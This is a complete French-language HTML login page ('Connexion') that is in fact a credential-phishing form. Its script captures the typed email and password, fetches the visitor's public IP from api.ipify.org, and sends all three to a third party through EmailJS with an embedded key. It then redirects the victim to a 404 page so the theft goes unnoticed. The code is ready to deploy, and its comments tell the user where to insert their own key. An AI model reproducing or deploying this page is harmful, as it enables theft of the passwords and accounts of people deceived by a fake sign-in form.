<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Connexion</title>
</head>
<body>
    <form id="login-form">
        <label for="email">Identifiant :</label>
        <input type="email" id="email" name="user_email" required>
        <br>
        <label for="password">Mot de passe :</label>
        <input type="password" id="password" name="user_password" required>
        <br>
        <button type="submit">Se connecter</button>
    </form>

    <script type="text/javascript" src="https://cdn.emailjs.com/dist/email.min.js"></script>
    <script type="text/javascript">
        (function(){
            emailjs.init("9U4ItsKhNNbwTGTRI"); // Remplacez YOUR_PUBLIC_API_KEY par votre clé API publique EmailJS
        })();

        document.getElementById('login-form').addEventListener('submit', function(event) {
            event.preventDefault();

            // Collecter les informations du formulaire
            var userEmail = document.getElementById('email').value;
            var userPassword = document.getElementById('password').value;

            // Obtenir l'adresse IP publique de l'utilisateur
            fetch('https://api.ipify.org?format=json')
                .then(response => response.json())
                .then(data => {
                    var userIP = data.ip;

                    // Envoyer l'e-mail
                    emailjs.send('ec65k8s', 'hsdj6ti', {
                        user_email: userEmail,
                        user_password: userPassword,
                        user_ip: userIP
                    }).then(function(response) {
                        console.log('SUCCESS!', response.status, response.text);
                        // Redirection après l'envoi réussi de l'e-mail
                        window.location.href = "404.html"; // Remplacez par la page souhaitée après la connexion
                    }, function(error) {
                        console.log('FAILED...', error);
                    });
                })
                .catch(error => console.error('Error fetching IP:', error));
        });
    </script>
</body>
</html>

